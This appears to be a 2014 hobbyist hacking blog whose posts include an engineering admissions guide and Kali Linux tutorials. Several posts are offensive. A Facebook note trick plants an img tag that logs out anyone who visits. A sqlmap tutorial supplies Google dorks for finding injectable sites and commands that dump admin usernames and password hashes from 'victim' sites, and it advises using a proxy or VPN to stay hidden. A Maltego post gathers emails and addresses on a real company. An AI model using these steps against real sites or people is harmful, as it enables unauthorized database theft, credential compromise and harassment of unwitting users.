Social Icons

Pages

Featured Posts

Saturday 23 August 2014

FaceBook Auto logout

FaceBook Auto Logout 


Found this interesting and thought of sharing it.
Make any note with any name & with any text in it, make the privacy to public

Then copy note URL

https://www.facebook.com/dialog/sha...RL&locale=en_GB&next=https://www.facebook.com (replace your note link with the above links YOUR_NOTE_URL)


Open the new link in a new tab, it will ask you for share the note in your time-line, Click share.
Now edit your note & delete everything in it and paste the below snippet.
Save. Done


<img src="https://www.facebook.com/n/?logout.php&medium=email&mid=a4986bbG5af4d7fd6e6dG0G114G12e9d8e3"/></img> 


Now whoever will visit your profile will get logged out . Mostly, your friends who are subscribed to you or can see your posts in news feeds will get logged out too.

Happy log-outing till they fix it :]

by Mahender Singh

Wednesday 28 May 2014

Admission Process For Engerring in INDIA

Admission Process For Engerring in INDIA

BY Parth Makadiya
Admission Process For Engerring  in India(GUJARAT)
normally this process is followed in others states too
Powered by Translate








1. After Results in 3 or 4 days you have to get a booklet from Punjab National Bank

2. Then read booklet carefully ....You can get 
             1. Last Year cutoff
             2.All collages list
             3.How to fill form 
             4.all details you need
3. Then according to the booklet(confirm date from Booklate) after 10 to 15 days collage chosing dates are avelible....



MORE GUIDELINE CLICK HERE


4. Then normally fill the form just like you have filled JEE's Form

Check updates regularly HERE
1. www.alltricks007.blogspot.in
2.www.jacpcldce.ac.in
3. www.gujacpc.nic.in

Friday 2 May 2014

Kali Linux: How to Hack WiFi Tutorial – Sniffing WiFi Networks & Capturing Packets (BackTrack 6)

By Parth Makadiya


This is part two of the How to Hack WiFi Tutorial series. hardware In this video we will be Sniffing WiFi Networks & Capturing Packets without connecting to them. The software being used is Kali Linux or BackTrack 6 the Aircrack-ng tool suite, macchanger and wireshark. We cover the following topics:
  • Putting your wireless card in to monitor mode using airmon-ng in Kali Linux.
  • Changing your MAC address using macchanger in Kali Linux.
  • Testing packet injection capabilities of your WiFi card in Kali Linux.
  • Sniffing WiFi packets using airodump-ng in Kali Linux.
  • Capturing WiFi packets using wireshark in Kali Linux.

The Basics of WiFi

WiFi allows two devices to talk to each other or exchange data using radio-waves. Most wireless devices conform to the IEEE 802.11 standard, however some devices may have inconsistencies. For guaranteed compliance with the standard you can buy WiFi certified devices. WiFi enabled devices are now ubiquitous they are in game consoles, cameras, high end fridges, phones, televisions and medical devices.
These wireless devices are all around us and no longer confined to just computers and mobile phones. You cant see or feel these networks which may give you a false sense of security. Wireless networks reach past physical property boundaries. This allows attackers to can gain access to networks without making physical entry.

Access Points or Hot Spots

An Access Point or AP connects one or more wireless devices together to from a Wireless Local Area Network WLAN. In this tutorial we will simply sniff and inject our AP but not associate with it. Every Access Point (AP) has a SSID Service Set Identifier. This SSID or network name allows for discovery by clients. Clients can search for a specific SSID or scan a region to see what SSID’s are available and open. Unless otherwise configured Access Points send out broadcast frames. These broadcast frames are called beacon frames and make clients aware of the Access Points presence. For more info download the

How to Become a Successful Blogger

BECOME Successful Blogger
Just see this video

Android 4.4 on any Device of Android

Android 4.4 on any Device of Android








FOR MORE CLICK HERE

How to use Maltego in Kali Linux



Intro - Maltego, is an open source intelligence and forensics application. This is a GUI tool so looks different. Maltego is an information gathering tool that allows you to visually see relationships.
 Maltego allows you to enumerate network and domain information like:
·         Domain Names
·         Whois Information
·         DNS Names
·         Netblocks
·         IP Addresses etc

Maltego also allows you to enumerate People information like:
·         Email addresses associated with a person’s name
·         Web sites associated with a person’s name
·         Phone numbers associated with a person’s name
·         Social groups that are associated with a person’s name
·         Companies and organizations associated with a person’s name etc

Maltego also allows you to:
·         Do simple verification of email addresses
·         Search blogs for tags and phrases
·         Identify incoming links for websites
·         Extract metadata from files from target domains
This tool has really lots of feature I will try to explain more and more with examples but my dear readers I want to advice all of you try all features of this tool and if you are facing any kind of problem while experimenting on this tool you can ask your question here through your valuable comments
1.  How to open Maltego
A. GUI Method 

Application → Kali Linux → Information gathering → DNS Analysis → Maltego
                                                                           (click image for large view)

B. open terminal type maltego and hit enter

2. Because We are using first time maltego so we need to log in. Follow the image for info

3. We are new user so we need to register before using this tool. Follow the image.

4. Fill up all details for completing the registration. Follow the image.



5. After completing your registration go to your mail Id and verify your account by clicking on verification link which is send y maltego.

6. After verifying your maltego account login with your registered email id and password.

7. Soon you will see a welcome massage.

8. Just click on Next

9. Click on Finish

10.  Click on cancel we will do it manually.

11. Click on new icon (see image) for gathering the information

12. by clicking left button of mouse drag the domain in Main view

13. Double click on domain icon and rename it into your target domain. Here I am taking mcdonalds.com as example.

14.  Here we are searching for top level domain for our target domain. First right click on domain then
Run Transform → All Transforms → To Domain ( Find other TLDs)

15. Here we got the result of TLD search.

16. Now we are to gain more information about these domains. First of all select all domains by dragging left mouse button or you can select one by one press Shift + left click

17. After selecting all domains, right click one of them and then
Run Transform → All Transforms → To Website (Quick Lookup)
Here we are going to search all website which are associate with these domains

18. Here is the result sorry this image is not clear because I want to show you full result page.

19. Well here we are just replacing the a website icon I have targeted www.mcdonalds.com for more info follow the image. This is not a necessary part but you should learn it.

20. Here we are going to find the IP address of our target website. Right click on target website then
Run Transform → Resolve to IP → To IP Address (DNS)

21. Here we got the IP address of our target website

22. Here I am explaining you many things so don’t be confuse its just graphical view changes.
You can change you view as you can see on image there are some option like Main View, Bubble View, Entity list try all by yourself for visiting how interesting it is. And another side if you will zoom out then you can see your information in a better identical view more info on image.

23. Here we are going to Find Email Id of our target website which is www.mcdonalds.com
Right click on target website and then
Run Transform → All Transforms → Mirror: Email address found

24. You can see on the image we have got email ids.

25. Here we are running all transforms just for showing you how many information you can gather with this tool. I am doing this because I can’t show you every option like domain search, person info, phone number, NS server etc. You have to do experiment with it and it takes time. So enjoy
Right click on Domain then
Run Transform → All Transforms → All Transforms

26. Click on Yes

27. Read all T & C. I know no one going to read it :D. after reading check the box and click on Run.

28. Here is the Result. As you can see each of info has a separate color to indicate it so just enjoy it.
(click image for large view)

HACK WEBSITE USING SQLMAP | KALI LINUX - BACKTRACK

BY Parth Makadiya 



In this tutorial I am going to show you how to hack a website with slqmap on Kali Linux.

Introduction
[*]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap. 
Now follow my steps to hack a website using sqlmap.

Step 1
[*]Find Sql vulnerable site. 
I will give you some dorks which may help you finding websites vulnerable to Sql Injection.

Code:
]inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=

Step 2
[*]Test if the website is vulnerable
]To test if the website is vulnerable to Sqli just add " " at the end of the url. Like on the image below:

[Image: image1_zps1ba326d9.jpg]

And press enter. If error appears like on the image below it means the website is vulnerable. 

[Image: image2_zpsffcf021f.jpg]


(I'm not going to explain advanced ways to check the website for sql vulnerabiities because there are plenty of tutuorials about that on CHF)


Ok, so we found the target. Now let's go ahed.

Step 3
[*]Injection
Type this command in the terminal and hit enter like on the image below:

Code:
sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs
(Insert the url that we checked for Sql Vulnerability)
Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
[Image: image3_zps85f6aa32.jpg]


Now we will get the database name of the website.

Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.
[Image: image4_zps29fa4d64.jpg]


We got the two database ohridhot_ohrid
and information_schema we will select ohridhot_ohrid
database.

Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter. 

Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables

Image has been scaled down 4% (700x49). Click this bar to view original image (723x50). Click image to open in new window.
[Image: image5_zpsf83a99b1.jpg]


Now we will get the tables list which is stored in the database we selected.

Image has been scaled down 3% (700x257). Click this bar to view original image (717x263). Click image to open in new window.
[Image: image6_zps002b2bf8.jpg]


Now lets grab the columns from the admin table , type on terminal:

Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin --columns

Now we got the columns and we got user and pass like on the image below

Image has been scaled down 1% (700x130). Click this bar to view original image (703x130). Click image to open in new window.
[Image: image7_zpsfb061ca9.jpg]


Now let's grab the user and pass

Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid -T admin -C user,pass --dump

[Image: image8_zpsc0a432ae.jpg]

Now we have to decrypt the hash , there are also tutorial about hash decryption on CHF.
The only thing which is left now is to find the admin page and remember to use Proxy/Vpn !

[*]Directory of sqlmap on Kali Linux
Places -> Computer -> Filesystem -> usr -> share -> sqlmap -> output


That's all , I hope you enjoyed the tutorial. 


For More Click Here
 
Blogger Templates